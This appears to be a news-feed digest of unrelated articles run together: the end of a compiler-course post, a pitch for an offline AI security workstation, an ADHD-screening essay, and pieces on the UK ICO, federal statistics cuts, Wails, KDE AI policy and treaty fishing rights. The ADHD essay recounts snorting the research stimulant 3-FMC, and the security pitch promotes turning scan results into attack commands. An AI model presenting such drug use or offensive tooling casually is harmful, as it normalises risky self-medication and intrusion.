doing this, we sacrifice a lot that might be typically covered:
Our languages aren’t type/memory safe, we assume the programmer is
correct
No register allocation (possible to add, not too hard)
No garbage collection of any kind: we
just use malloc
. We could
trivially support the Boehm GC (I have done that in the past), but
it was another static library to link in and I really wanted to make
this self contained.
We support a
very
limited set of builtins (but it is trivial to
add more)
So even after project 5, getting to a “real” compiler would take a bit
of effort. The most important (in my opinion) are (a) memory safety
(the language needs to be safe, period) via dynamic type tagging and
(b) slightly more builtins, and (c) register allocation. That would
get us to a respectable compiler. After that, we could add more
language features, or optimize the ones we have, e.g., by using
abstract interpretation.
An Example Program
Our language will include functions, loops, branching, assignment, and
even heap-allocated vectors. As an example of the power, here’s a
Sudoku solver written in the language
(program
;; =========================
;; List primitives
;; Empty list is (void)
;; =========================
(define (is_nil x) (eq? x (void)))
;; cons cell as 2-element vector: [0] = head, [1] = tail
(define (cons h t)
(let ([c (make-vector 2)])
(let ([_ (vector-set! c 0 h)])
(let ([_ (vector-set! c 1 t)])
c))))
(define (head c) (vector-ref c 0))
(define (tail c) (vector-ref c 1))
;; =========================
;; Cell representation
;; cell = (row col val) as nested cons
;; =========================
(define (make_cell r c v)
(cons r (cons c (cons v (void)))))
(define (cell_row cell)
(head cell))
(define (cell_col cell)
(head (tail cell)))
(define (cell_val cell)
(head (tail (tail cell))))
;; =========================
;; Block indexing (0,1,2) for rows/cols
;; =========================
(define (block_index3 x)
(if (< x 3)
0
(if (< x 6)
1
2)))
(define (same_block? r1 c1 r2 c2)
(if (eq? (block_index3 r1) (block_index3 r2))
(eq? (block_index3 c1) (block_index3 c2))
#f))
;; =========================
;; Lookup current value at (row, col) in board
;; board is a list of cells
;; Return 0 if not assigned
;; =========================
(define (lookup board row col)
(if (is_nil board)
0
(let ([cell (head board)])
(let ([r (cell_row cell)])
(let ([c (cell_col cell)])
(if (and (eq? r row) (eq? c col))
(cell_val cell)
(lookup (tail board) row col)))))))
;; =========================
;; Conflict check:
;; #t if some cell in board has:
;; - same value, and
;; - same row OR same col OR same 3x3 block
;; =========================
(define (conflicts? board row col val)
(if (is_nil board)
#f
(let ([cell (head board)])
(let ([r (cell_row cell)])
(let ([c (cell_col cell)])
(let ([v (cell_val cell)])
(if (and (eq? v val)
(or (eq? r row)
(or (eq? c col)
(same_block? r c row col))))
#t
(conflicts? (tail board) row col val))))))))
;; =========================
;; Recursive backtracking solver over (row, col)
;; board: list of assignments
;; rows, cols = 0..8
;; =========================
(define (solve_cell row col board)
(if (eq? row 9)
;; All rows done: solved
board
(if (eq? col 9)
;; End of row: go to next row
(solve_cell (+ row 1) 0 board)
;; Otherwise, try this cell
(let ([existing (lookup board row col)])
(if (eq? existing 0)
;; Empty cell: try values 1..9
(let ([candidate 1])
(let ([solution (void)])
(begin
(while (and (< candidate 10)
(eq? solution (void)))
(begin
(if (conflicts? board row col candidate)
;; conflict, skip
(set! solution solution)
;; no conflict, extend board and recurse
(let ([s (solve_cell row
(+ col 1)
(cons (make_cell row col candidate)
board))])
(if (eq? s (void))
(set! solution solution)
(set! solution s))))
(set! candidate (+ candidate 1))))
solution)))
;; Pre-filled cell: just move on
(solve_cell row (+ col 1) board))))))
;; =========================
;; Read initial board from input:
;; 81 integers, row-major, 0 = empty, 1..9 = given
;; Returns list of cells
;; =========================
(define (read_board)
(let ([board (void)])
(let ([i 0])
(begin
(while (< i 9)
(begin
(let ([j 0])
(while (< j 9)
(begin
(let ([v (read)])
(if (eq? v 0)
(set! board board)
(set! board (cons (make_cell i j v) board))))
(set! j (+ j 1)))))
(set! i (+ i 1))))
board))))
;; =========================
;; Entry: read board, solve from (0,0), return solution
;; Solution is a list of (row col val) cells
;; =========================
(let* ([board (read_board)]
[solution (solve_cell 0 0 board)])
(lookup solution 8 8)))
The Full Language
The final language you’ll implement will be this one. In comments,
I’ve also highlighted the sublanguages: for example, project 2
includes only numbers, input (read), binary plus, unary minus,
variable references and let binding. It grows to all of
R5
.
input-files/
– Input streams for programs (lines of integers).
goldens/
– Instructor goldens (IR snapshots, interpreter outputs, and stdout baselines).
You write your code in
compile.rkt
, which consists of a set of
passes
. Each pass transforms an input language into an output
language, and these intermediate languages (IRs) are codified via
predicates in
irs.rkt
. To define the meaning of each IR, we give an
interpreter for each in
interpreters.rkt
. For the compiler to be
correct, it needs to be the case that–for all input streams–the
compiler produces the same output stream across all intermediate
IRs. There is some system-specific stuff in
system.rkt
, which takes
care of things like Linux vs. Mac ABI issues, specifying register
names, etc. The
main.rkt
file acts as a main compiler entrypoint,
and it carefully runs each pass of the compiler, checking predicates
before/after each pass and interpreting each IR, checking to ensure
consistency. This is a
huge
win for debugging, in my opinion: you
always
want to localize errors to the proximate pass which causes
misinterpretation, and
main.rkt
seriously aids debugging in my
experience. There is also more comprehensive test infrastructure in
test.rkt
; this test script is invoked by the Python-based test
scripts in
test/
. These tests check the behavior of the compiler on
the programs in the
test-programs/
directory, using the files from
input-files
as inputs and comparing to the outputs in
goldens/
.
Why Is This Course Unique and Cool?
You build a
real compiler
, all the way to actual x86-64
assembly.
Each IR has a corresponding interpreter, which is easy to find/read
and written in a familiar style, giving semantic clarity and
testable correctness.
The project is
language scalable
, meaning that you can use it as
a base for building your own language. Of course, this is thanks to
Dr. Siek’s great “incremental” design.
It is
fully testable across multiple passes
, which helps
anticipate the thing we all fear most about writing a compiler:
seeing a problem that is the ramification of far-away code from
higher up in the compilation pipeline.
It is written in a
simple, pure recursive style
. Just plain old
pattern matching and recursion here, no need for any complex
abstractions.
How Do I Get Started?
Familiarize yourself with the course webpage: https://kmicinski.com/cis531-f25
If you don’t know Racket, start with project 1: https://kmicinski.com/cis531-f25/projects/1
Otherwise, start with project 2: https://kmicinski.com/cis531-f25/projects/2
When you finish each project, move on to the next!
When you’re done, start building your
own
language. Consider
adding type (checking/inference), classes, more builtins, pattern
matching, continuations, exceptions, algebraic effects. The options
are myriad, but once you’ve finished projects 2-5, you’ve built a
whole compiler for a surprisingly expressive language.
Thank you to the National Science Foundation and Others
If you like this work and live in the United States, please feel
commensurately less bad about paying your taxes. I made the whole
class free, at least as free as I could given practical
constraints. This class work on compilation is partially supported by
our
NSF PPoSS
large
,
which has already produced
many
cool
major
results
. In
subsequent explorations, I am hoping that I can use this class
compiler as a baseline for highly-scalable engines that reason about
programs. Given the simple, self-contained nature–and the presence of
per-pass interpreters and consistency testing–I see this as an
awesome potential baseline for cool extensions.
My course is of course heavily inspired by Prof. Siek’s book and
course, along with inspiration from Thomas Gilray at Washington
State. Eight years ago, Tom and I took a spontaneous trip to see the
eclipse halfway across the country (skipping out on the ICSE ‘17
deadline basically); we discussed compiler design over a steamed
seafood buffet in Myrtle Beach after napping in a cheap motel, having
been awake for over 24 hours and feeling the eclipse had made it worth
it. We sketched out his whole compiler on that roadtrip, and ever
since that night eating steamed crabs, I wanted to build my own course
compiler. Now that I have, I am not sure it compares to waking up for
just four hours of twilight, only to consume copious amounts of butter
and shellfish as the brisk ocean air wisps over your face, the
closures and continuations softly washing rhythmically through the
conversation as you walk along the beach back to your $50 motel room.
In closing, thanks for checking this out, this compiler was a ton of
fun to build. Even as someone who has some amount of expertise in
compiler design, building it and getting it 100% right (I hope!) was
such a rewarding experience. My real sincere hope is that it offers
students (and you!) a fun journey. If you end up doing anything this,
please get in touch: kkmicins@syr.edu. I’d love to see what you come
up with. Best wishes,
Kristopher Micinski
– Syracuse, November, 2025
Show HN: Syd – An offline-first, AI-augmented workstation for blue teams
In a world of cloud-based AI, Syd stands apart. Delivered on a physical 1TB SSD and updated via encrypted USB, Syd is truly air-gapped. This means zero risk of your sensitive client data, vulnerabilities, or proprietary tools ever being exposed to a third-party service.
Powered by local Dolphin Llama 3 8B model – no internet connection required
Accelerated Workflow
Turn hours of manual analysis into seconds of AI-powered insight. Syd's RAG engine searches over 356,000 cybersecurity knowledge chunks and instantly transforms raw tool output into actionable intelligence.
Automatic detection of Nmap, Volatility, YARA, PCAP, and over 20 other tools
On-Demand Expertise
Syd combines a specialised LLM with over 356,000 chunks covering Metasploit exploits, Atomic Red Team techniques, forensics workflows, CVE databases, and threat intelligence, making expert-level knowledge accessible around the clock.
2GB+ knowledge base including exploits, forensics, and incident response workflows
For Red Teams
Syd empowers you with instant access to exploit intelligence. Paste Nmap results and get ready-to-run Metasploit commands and Exploit-DB links, turning vulnerability scans into actionable attack plans in seconds.
Syd provides context-aware remediation steps, malware-specific workflows from YARA outputs, and deep forensic insights from Volatility findings, helping you respond to threats faster and more effectively.
Syd knows the difference between offensive and defensive tools, providing exploit guidance for Nmap scans and remediation steps for YARA detections automatically.
There is a six-question test for ADHD that takes a minute to complete. If you score highly on it, you are likely to have ADHD and have a strong reason to talk to a psychiatrist about getting medication. It’s a low-effort way to surface a real problem for yourself — or help someone else surface it.
Here’s the story of how I found the test. If you just want the test, skip this section.
A few years ago when I was moving from Moscow to London I had small leftover amounts of simulants
3-FMC
and
MDPV
from my student days. I’d use them for productivity during exam periods, but I never actually enjoyed them recreationally. Still, I was not going to carry sketchy chemicals across two borders, so I figured I’d experiment with recreational use.
I snorted a small line of 3-FMC and instead of having fun I finally felt clearheaded enough to stop procrastinating on writing a farewell post for my then-colleagues. I knew stimulants are a common treatment for ADHD, so a question popped into my head: do I have ADHD? Yes,
stimulants help everyone focus
, but the contrast was too striking to ignore.
I took a few online tests, they
did
suggest ADHD. I then read more about ADHD online and that also suggested I had it. I kept reading and reading wanting full certainty.
An actual depiction of me trying to figure out ADHD
There was only one definitive way to find out: get a diagnosis from a psychiatrist.
I was leaving Russia in a few weeks, and Russia bans first-line ADHD medications like amphetamine and methylphenidate. So I decided to wait until I moved to London. After two months after arriving in London, I booked a private assessment with a psychiatrist. Shortly after, I had the 1.5 hour assessment and walked out with an ADHD diagnosis and a prescription for lisdexamfetamine, a prodrug of d-amphetamine.
One of the questionnaires they sent me before the appointment was very short. I later learned that this six-question screener is surprisingly effective.
In the test above, give yourself one point for each answer in the grey square. If you score 4 out 6, you have a strong reason to suspect ADHD and get a proper assessment.
They correctly identify two thirds of adults with ADHD and miss the other third.
They flag 0.5% of people without ADHD as possibly having ADHD.
If we assume 5% of people have ADHD (
this source
gives 4.4%, and
this
gives 6%), then:
The test would correctly pick up 3.5% of the population as having ADHD (0.69 × 5%).
It would incorrectly flag about 0.5% (≈0.475%, rounding up) of the population who don’t have ADHD.
So if you score 4 out of 6, the chance you actually have ADHD is:
3.5% / (3.5% + 0.5%) = 87.5%.
ADHD is highly treatable with meds. First-line treatments for ADHD — stimulants like amphetamine and methylphenidate — work really well. To quote a podcast on psychiatry: “Stimulants are one of the most effective meds in psychiatry” (
source
), ”Not many treatments in psychiatry have a large effect size. There’s stimulants for ADHD, ketamine for depression” (
source
).
70-90%
of people with ADHD find stimulants effective and experience noticeable quality of life improvements.
And if you don’t want to take stimulants or they don’t work for you, there are non-stimulant medications, such as
atomoxetine
or
Intuniv
.
This test is an imperfect screening tool that misses a third of all true ADHD cases and incorrectly flags a small percentage of non-ADHD people. But it has an incredible signal to effort ratio — it only takes a minute to take. If you score above its threshold — you have a strong reason to seek a full assessment.
Even if you are confident you don’t have ADHD, it’d only take you a minute to test your distractible friend. The right medication could be life-changing for them — it certainly was for me.
Changing the default hash function from SHA-1 to SHA-256, improving security.
Changing the default storage format to better support macOS and Windows, and to improve performance.
More formally integrating Rust into Git’s own build process
About thoughtbot
We've been helping engineering teams deliver exceptional products for over 20 years. Our designers, developers, and product managers work closely with teams to solve your toughest software challenges through collaborative design and development.
Learn more about us
.
Civil liberties groups call for inquiry into UK data protection watchdog
Guardian
www.theguardian.com
2025-11-24 06:00:30
Campaigners including Good Law Project describe ICO ‘collapse in enforcement activity’ after Afghan data breach Dozens of civil liberties campaigners and legal professionals are calling for an inquiry into the UK’s data protection watchdog, after what they describe as “a collapse in enforcement act...
Dozens of civil liberties campaigners and legal professionals are calling for an inquiry into the UK’s data protection watchdog, after what they describe as “a collapse in enforcement activity” after the scandal of the
Afghan data breach
.
A total of 73 academics, senior lawyers, data protection experts and organisations including Statewatch and the Good Law Project, have written a letter to Chi Onwurah, the chair of the cross-party Commons science, innovation and technology committee, coordinated by Open Rights Group, calling for an inquiry to be held into the office of the information commissioner, John Edwards.
“We are concerned about the collapse in enforcement activity by the Information Commissioner’s Office, which culminated in the decision to not formally investigate the Ministry of Defence (MoD) following the Afghan data breach,” the signatories state. They warn of “deeper structural failures” beyond that data breach.
The
Afghan data breach
was a particularly serious leak of information relating to individual Afghans who worked with British forces before the Taliban seized control of the country in August 2021. Those who discovered their names had been disclosed say it has put their lives at risk.
“Data breaches expose individuals to serious danger and are liable of disrupting government and business continuity,” the letter states. “However, in a recent public hearing hosted by your committee, Commissioner John Edwards has shown unwillingness to reconsider his approach to data protection enforcement, even in face of the most serious data breach that has ever occurred in the UK.”
The signatories cite other serious data breaches including those affecting victims of the Windrush scandal.
But they say the ICO has applied its “public sector approach” in these cases and either issued reprimands – written notices that lack the force of law – or significantly lowered the monetary penalties it awarded.
“The ICO decision not to pursue any formal action against the MoD despite their repeated failures was extraordinary, as was its failure to record its decision making. The picture that emerges is one where the ICO public sector approach lacks deterrence, and fails to drive the adoption of good data management across government and public bodies.”
“The handling of the Afghan data breach is not an isolated case; many are being let down by the ICO and its numerous failures to use corrective powers.”
The letter warns that alongside the shift away from enforcement in the public sector, statistics contained in the
latest ICO report
show that private sector enforcement is also becoming rarer as organisations are diverting resources away from compliance and responsible data practices, knowing that the ICO is not going to pursue the matter.
“Parliament has given the ICO considerable powers not to politely hope for the best, but to enforce compliance with legally binding orders. As we heard from the public hearing you hosted, the ICO chose not to use these powers to address the Afghan data breach.
“Unfortunately, the Afghan data breach is not an isolated incident, but the symptom of deeper structural failures which are emerging in the way the ICO operates.”
The letter concludes: “Change appears to be unlikely unless the Science, Innovation and Technology Committee uses their oversight powers and steps in.”
A spokesperson for the ICO said: “We have a range of regulatory powers and tools to choose from when responding to systemic issues in a given sector or industry.
“We respect the important role civil society plays in scrutinising our choices and will value the opportunity to discuss our approach during our next regular engagement. We also welcome our opportunities to account for our work when speaking to and appearing before the DSIT select committee.”
Sunday Science: The Gravity Particle Should Exist. So Where Is It?
Portside
portside.org
2025-11-24 05:26:22
Sunday Science: The Gravity Particle Should Exist. So Where Is It?
Ira
Mon, 11/24/2025 - 00:26
...
Sunday Science: The Gravity Particle Should Exist. So Where Is It?
Published
Matthew John O'Dowd
is an Australian astrophysicist. He is an associate professor in the Physics and Astronomy Department at the Lehman College of the City University of New York and the writer and host of PBS Space Time.
Space Time
explores the outer reaches of space, the craziness of astrophysics, the possibilities of sci-fi, and anything else you can think of beyond Planet Earth with our astrophysicist host: Matthew O’Dowd.
Matt O'Dowd spends his time studying the universe, especially really far-away things like quasars, super-massive black holes, and evolving galaxies. He uses telescopes in space to do it. Matt completed his Ph.D. at NASA's Space Telescope Science Institute, followed by work at the University of Melbourne and Columbia University. He's now a professor at the City University of New York's Lehman College and an Associate at the American Museum of Natural History's Hayden Planetarium.
Previous host Gabe Perez-Giz is an astrophysicist who studies black hole physics. He received his Ph.D. from Columbia University and also hosted PBS Infinite Series.
It’s actually quite simple. You stop measuring them.
The government shutdown that just concluded left the country in something of a data blackout. Some major economic data releases have been delayed (like the September jobs report, which belatedly
came out today
), and others canceled altogether (the October jobs report, which will
never be released
). This has made it unusually difficult for U.S. businesses and the Federal Reserve to assess how well the economy is doing.
But if you assume the reopening of the government has put an end to these challenges, think again. The real threat to our understanding of the U.S. economy, and the country’s health writ large, is not that measly, six-week shutdown fight. It’s the fact that the Trump administration has been quietly snuffing out thousands of other data series, particularly those that might produce politically inconvenient results.
Take for example President Donald Trump’s boasts about bringing more international investment into the United States.
1
He extracted pledges from
Switzerland
and
South Korea
. Just this week, he boasted of a whopping
$1 trillion
in blood money from Saudi Arabian Crown Prince Mohammed bin Salman (as my colleague
Andrew Egger notes
, the Saudi investment jumped from $600 billion to $1 trillion in the course of a few minutes and would, if real, amount to an absurd chunk of the country’s GDP).
But fulfillment of such pledges is notoriously fickle; in the past, plenty of foreign companies and governments have promised big investments in U.S. factories and jobs that
never materialized
, generating bad headlines for the politicians who wrangled them. Fortunately for Trump, these pledges will become increasingly un-fact-checkable.
That’s because yesterday, to relatively little fanfare,
the U.S. Bureau of Economic Analysis
announced
it was discontinuing some of its data collection on foreign investment in the United States as part of its “ongoing streamlining initiatives.” This follows
previous announcements
from the BEA in recent months about how it was paring back other data collection on foreign direct investment due to “
resource constraints
.”
In the absence of data, I guess we’ll simply have to trust Trump when he says that he’s delivered.
Now, do I think Trump
directed
the BEA to eliminate these measures specifically to make it easier for him to bullshit about his dealmaking prowess? Not exactly. While there are some cases where the administration has leaned on statistical agencies or explicitly
censored their findings
, the more common and less visible tactic has been to just
defund them
.
Trump’s
fiscal year 2026 budget request
for the Bureau of Economic Analysis reflects a 20 percent reduction compared to last year, a target that agency staff have told me they’ve already
hit
thanks to DOGE cuts, early retirements, and hiring freezes. (The comms team at BEA—like most statistical agency press offices I’ve contacted in recent months—has declined to confirm or deny these numbers.) This has forced the BEA to make tough choices. The agency also is responsible for producing much higher-profile, market-moving data, such as the reports on GDP, consumer spending, and the Federal Reserve’s preferred measure of inflation. Something had to give, and this week, that something was data on foreign investment.
Other major statistical agencies are struggling with their own brain drains and funding cuts.
Take the Bureau of Labor Statistics, which releases data on the job market and prices, among other marquee measures. In August, Trump’s decision to fire Erika McEntarfer, the BLS commissioner, grabbed headlines,
2
but the top job is hardly the only hole this administration has blown in that agency. At the time of McEntarfer’s firing, a third of senior BLS leadership positions were
already vacant
. (That’s
still the case
, in fact.)
The rest of the agency has been swiss-cheesed too. Some regional field offices—such as the consumer price index offices in Buffalo, New York; Lincoln, Nebraska; and Provo, Utah—have been
shuttered entirely
. Meanwhile, post-COVID, the agency was already struggling with reduced survey-response rates, which have made its numbers noisier and more susceptible to big revisions. The administration’s response has been to
disband the task force
working to fix these problems.
The result is that federal data are being degraded—or deleted altogether. And deletion is especially common when statistical series measure issues that this administration would rather not track.
In September, for instance, the administration canceled a three-decade-old annual survey that measures how many Americans
struggle to get enough food
. A few months earlier, HHS eliminated the team that
produces the poverty guidelines
, which determine how we count the number of people in poverty and eligibility for benefits such as SNAP, Medicaid, Head Start, and childcare subsidies. But hey, if you never determine who’s eligible for benefits, maybe that means no one is.
Lots of people might take these numbers for granted, but we’ll notice when they’re gone. We need these data to
interpret the world around us and make decisions
. Consumers use them to track the weather, determine where to send their kids to school, and negotiate raises. Businesses use them to hire, invest, price, and purchase. Doctors use them to diagnose illnesses. Public officials use them to craft policy.
3
And voters use them to determine whether their elected officials are keeping their promises.
But instead of recognizing the usefulness of these data—or perhaps
because
he recognizes it—the president has chosen to curate his own
reality
.
As was the case last week, when the White House cheerily announced that inflation had fallen because
DoorDash’s breakfast offerings
had gotten cheaper, and because Walmart had
shrinkflationed
its
Thanksgiving dinner deal
. Maybe this seemed forgivable when government agencies were shut down and everyone was looking for alternative measures to fill the statistical void. My fear is that the voids are multiplying.
1
Boosting foreign direct investment in the United States is a somewhat bizarre thing for Trump to fixate on, since higher FDI mathematically
increases
our
trade deficits
. Which Trump believes are already catastrophically high. But whatever, not like Trump has a Wharton degree.
3
“I would not want anyone to think the data have deteriorated to a point where it’s difficult for us to understand the economy,” Federal Reserve Chair Jerome Powell said in a June
Senate hearing
. “But the direction of travel is concerning.”
Catherine Rampell
is economics editor at The Bulwark and an anchor at MS NOW (fmrly MSNBC). She specializes in econ, politics, public policy, immigration. Previously at WaPo, NYT, CNN, PBS NewsHour.
The Bulwark
was founded to provide analysis and reporting in defense of America’s liberal democracy.
We publish written articles and newsletters. We create podcasts and YouTube videos. We give political analysis from experts who have spent their lives in the business.
Some of what we do is behind a paywall. Most of what we do is not. That’s because we are a mission-based organization first and a business second.
And you can’t help save democracy from behind a paywall.
The Bulwark is a reader-supported publication. Sign-up to receive newsletters and support our work.
Build desktop applications using Go and Web Technologies
The traditional method of providing web interfaces to Go programs is via a built-in web server. Wails offers a different
approach: it provides the ability to wrap both Go code and a web frontend into a single binary. Tools are provided to
make this easy for you by handling project creation, compilation and bundling. All you have to do is get creative!
Features
Use standard Go for the backend
Use any frontend technology you are already familiar with to build your UI
Quickly create rich frontends for your Go programs using pre-built templates
Easily call Go methods from Javascript
Auto-generated Typescript definitions for your Go structs and methods
Native Dialogs & Menus
Native Dark / Light mode support
Supports modern translucency and "frosted window" effects
Unified eventing system between Go and Javascript
Powerful cli tool to quickly generate and build your projects
Multiplatform
Uses native rendering engines -
no embedded browser
!
Roadmap
The project roadmap may be found
here
. Please consult
it before creating an enhancement request.
This project is supported by these kind people / companies:
FAQ
Is this an alternative to Electron?
Depends on your requirements. It's designed to make it easy for Go programmers to make lightweight desktop
applications or add a frontend to their existing applications. Wails does offer native elements such as menus
and dialogs, so it could be considered a lightweight electron alternative.
Who is this project aimed at?
Go programmers who want to bundle an HTML/JS/CSS frontend with their applications, without resorting to creating a
server and opening a browser to view it.
What's with the name?
When I saw WebView, I thought "What I really want is tooling around building a WebView app, a bit like Rails is to
Ruby". So initially it was a play on words (Webview on Rails). It just so happened to also be a homophone of the
English name for the
Country
I am from. So it stuck.
Stargazers over time
Contributors
The contributors list is getting too big for the readme! All the amazing people who have contributed to this
project have their own page
here
.
License
Inspiration
This project was mainly coded to the following albums:
Then
$75
per month.
Complete digital access to quality FT journalism on any device.
Cancel anytime during your trial.
Explore more offers.
FT Edit
$49
per year
Access to eight surprising articles a day, hand-picked by FT editors. For seamless reading, access content via the FT Edit page on FT.com and receive the FT Edit newsletter.
Standard Digital
$45
per month
Essential digital access to quality FT journalism on any device. Pay a year upfront and save 20%.
Premium Digital
$75
per month
Complete digital access to quality FT journalism with expert analysis from industry leaders. Pay a year upfront and save 20%.
Explore our full range of subscriptions.
For individuals
Discover all the plans currently available in your country
For multiple readers
Digital access for organisations. Includes exclusive features and content.
Why the FT?
See why over a million readers pay to read the Financial Times.
I've been using KDE Plasma for four and a half years. The community is sweet and the software is stellar, and I see a bright future for it. I want it to be the best it can be! So, I'd like to talk about a small incident that I want KDE to lean away from.
TL;DR: Please look at adopting an "AI" Policy similar to
Servo's
. Other projects' policies, like Asahi Linux's (they love KDE!) and Bevy's, may also be worth a look. Even Forgejo has its "AI" Agreement, though in my opinion it's a bit watered down.
A light exchange; or,
the incident
.
Before Nate made his response, I was also thinking about their old Real Name Policy. I thought it was kinda funny that KDE rejected psuedonyms for years for provenance reasons — and then felt they should accept LLM contributions even though a scraping LLM cannot ever have provenance.
Nate's reply then emulsifies these two positions. It seems his takeaway was
not
that pseudonyms have a negligible impact on provenance, but instead that provenance is impossible and so KDE should give up.
I find this odd? The logic doesn't sit well with me.
He's turned
We can't know that someone's using a real name, so we must openly accept fake names.
Into
We can't know that someone's not using an LLM, so we must openly accept LLM contributions.
But these statements don't evaluate the worth of pseudonyms or LLM code, and are instead purely defensive — "How practical is it to guarantee we avoid
X
?" (Which for almost any given
X
, the answer is "We can't guarantee much at all". People can lie on the internet!)
My 2¢ is that there are other reasons to consider not accepting something. For instance, it would be bad to say,
We can't know that someone's not a nazi, so we must openly accept nazi contributions.
Excuse the invokation of Godwin's Law. Obviously, I don't believe this is a position KDE would hold. I'm just underscoring the need to
actually think about
whether having
X
in a project is good, and what ought to be done if we find instead that it's bad.
So, are LLM contributions bad?
LLM Contributions Are Bad
As mentioned, LLMs trained on scraped data cannot ever give complete attribution. It's how they work; it's the party trick of a black box. It's also non-consensual use, and it's plagiarism.
Occasionally, an LLM will regurgitate/resynthesize author credit. Sometimes these authors are not real, or are unrelated to whatever content is attributed to them. And unless the output is a 1:1 match for their work, it's incomplete credit and still plagiarism.
Hypothetically, one could train a language model to only use public domain or consensually granted data, such as code you've written yourself. But, these tend to give poor results.
LLMs bring downward pressure on code quality,
lost productivity
, and maintainer abuse. LLM contributions are often accompanied by an erroneous, nonsensical, or blathering description. The contributor also tends to have little-to-no understanding of the contribution and cannot personally answer questions from the review process.
This is a waste of maintainer time and labour
, is disrespectful, and can lead to burnout.
I understand KDE has had some prior run-ins with "AI", such as Kdenlive's optional
Whisper
integration and a few in-progress chatbot clients. I'm not terribly fond of these, but right now I'd just like to see a plan for an "AI" contributions policy.
I'm not a decorated developer nor an expert on how not to feed into fascism, so please reach out to others to discuss. Reach out to the folks at Servo or Krita, or Bevy and Asahi Linux. Reach out to David Revoy. To Ed Zitron. To Andrew Roach. Anyone. See
what people have already said
, recap
the ground we've already tread.
Heck, I'm sure Brodie Robertson could talk about similar projects who've had to wrestle with an "AI" Policy.
Anyway, thanks for taking the time to read. This is important to me, and you'll find it's important to many. Take care and best wishes!
The Third Sovereign
Portside
portside.org
2025-11-24 03:55:54
The Third Sovereign
Ira
Sun, 11/23/2025 - 22:55
...
University of North Carolina Press, 291 pp., $99.00; $22.95 (paper)
Billy Frank Jr. was fourteen when, in December 1945, he was fishing for salmon in the Nisqually River near Olympia, Washington, and state game wardens arrested him for the first time. Over the next twenty-five years he was arrested (and often jailed) more than four dozen times, despite his airtight defense: he fished under the terms of the Medicine Creek Treaty of 1854, one of ten treaties negotiated by Governor Isaac Stevens in which the US promised tribes in the Puget Sound area of the Pacific Northwest the right to fish where they’d always fished “in common with all citizens of the Territory.”
In 1965 the intensity of the arrests changed. Frank was fishing the Nisqually with his brother-in-law when armed wardens in a high-speed motorboat rammed Frank’s cedar canoe. “They got all kinds of training and riot gear—shields, helmets, everything,” Frank told Charles Wilkinson back in the 1970s, when Wilkinson was a young attorney with the Native American Rights Fund. “These guys had a budget. This was a war.”
In the mid-1960s Frank was one of several young activists in the Pacific Northwest who had begun staging “fish-ins,” acts of protest inspired by Black civil rights sit-ins but, a participant wrote, “done in a distinctive Indian way.” Native activists, with their families and allies, fished at riverside encampments, pressing their own fishing rights against state fishing prohibitions, resulting in arrests and news coverage and increasing brutality on the part of the state. The violence peaked in the summer of 1970, when state and local police raided an encampment on the Puyallup River in Tacoma, using rifles, tear gas, and batons to arrest dozens of men, women, and children.
One of the bystanders gassed during the melee was Stan Pitkin, the US attorney for western Washington who, days later, filed a complaint,
United States
v.
Washington
, on behalf of tribes that had signed the so-called Stevens treaties. The four-year trial resulted in a resounding victory for tribal sovereignty in the United States, reasserting the tribes’ fishing rights under the treaties and affirming those treaties as living documents—a verdict known today as the Boldt decision, named for its author, Judge George Boldt.
Frank served as the chairman of the Northwest Indian Fisheries Commission, the organization established by the 1974 ruling to aid the tribes in managing fisheries—a post he held for more than thirty years. In 2013 he asked Wilkinson, his old friend, by then an expert in federal Indian law, to write a book about the case. Wilkinson died in 2023, but the book he completed,
Treaty Justice
, deftly lays out one of the twentieth century’s most significant and underestimated legal decisions. “Judge George Boldt’s ruling…is a landmark in the American civil rights movement,” Wilkinson writes. “It belongs in the same company as
Brown
v.
Board of Education
and a select few other court cases in terms of bringing justice to dispossessed peoples.”
The trial began with a question: What were the circumstances under which these Pacific Northwest tribal nations signed the treaties negotiated by Isaac Stevens? A Massachusetts-born army engineer, Mexican-American War veteran, and railroad surveyor, Stevens was appointed governor of the newly established Washington Territory by his fellow veteran President Franklin Pierce in 1853. US expansion had slowed while Congress debated slavery’s future in the new territories, though Pierce still coveted Alaska, Hawaii, and Cuba and was eager to quickly solidify possession of what would become Washington, Idaho, and part of Montana. In the Northwest, the Donation Land Act of 1850 and its companion legislation, the Oregon Indian Treaty Act, called for the territorial commissioners to extinguish Native claims—declaring them null and void for the sake of white settlement—a task Stevens took on with alacrity.
The tribal cultures and economies Stevens encountered in the Puget Sound area were as varied as the region’s ecology. Around what are today called the San Juan Islands, the Lummi set reef nets in kelp beds to catch salmon in the northern sound’s open waters. To the south, the Nisqually fished the rivers and managed the prairies, burning forest to encourage grazing habitat for deer and elk. On the Olympic Peninsula, the Quinault caught salmon in their glacial rivers while harvesting shellfish along the Pacific coast, and on the peninsula’s northwestern tip, the Makah, whose warriors had repelled British sailors a century earlier, also caught salmon in their tidal rivers but focused on halibut and famously whales.
From 1820 to 1840, Wilkinson explains in
Treaty Justice
, the tribes had managed to coexist peacefully with British traders. But as the late Nisqually historian Cecelia Svinth Carpenter noted in
Stolen Lands: The Story of the Dispossessed Nisquallies
(2007), “The peacefulness of the scene fast disappeared when American families started arriving and building fences around choice Nisqually land.”
Stevens’s initial plan was to move all the tribes to a single reservation, an idea they quickly rejected. George Gibbs, a Harvard-educated ethnographer, suggested that tribal leaders would consider multiple reservations if guaranteed
the right of taking fish, at all usual and accustomed grounds and stations…, and of erecting temporary houses for the purpose of curing, together with the privilege of hunting, gathering roots and berries, and pasturing their horses on open and unclaimed lands.
The “final settlement,” as Stevens called it, was conducted in Chinook Jargon, a Pacific coast trade language of an estimated five hundred words, the effective use of which, a scholar noted, “depends on the ingenuity and imagination of the speaker.” Translating was Frank Shaw, a settler who, Wilkinson writes, “had only a moderate grasp of the Chinook Jargon and knew no Indigenous languages.”
Treaties were viewed by the US as a “temporary expedient,” in the words of the historian Alexandra Harmon, and in 1887 the General Allotment Act designated vast amounts of tribal land “surplus” based on the assumption that increasingly Americanized tribes would give up hunting and fishing communal lands for cultivating small private farms. Henry Dawes, the Massachusetts senator who wrote the act, saw collective ownership as Native America’s fatal flaw: “There is no selfishness, which is at the bottom of civilization.” Over the next half-century an estimated 90 million acres of Native land were taken by the US.
The effect of the Stevens treaties, for tribes in the Puget Sound area as elsewhere, was what Wilkinson calls “the long suppression.” “Native fishing rights, so central to tribal existence,” he explains, “were denied or scraped to the bone.” For decades private canneries and even dams decimated salmon runs, while US Indian agents forbade indigenous practices and sent Native children off to English-only Christian schools.
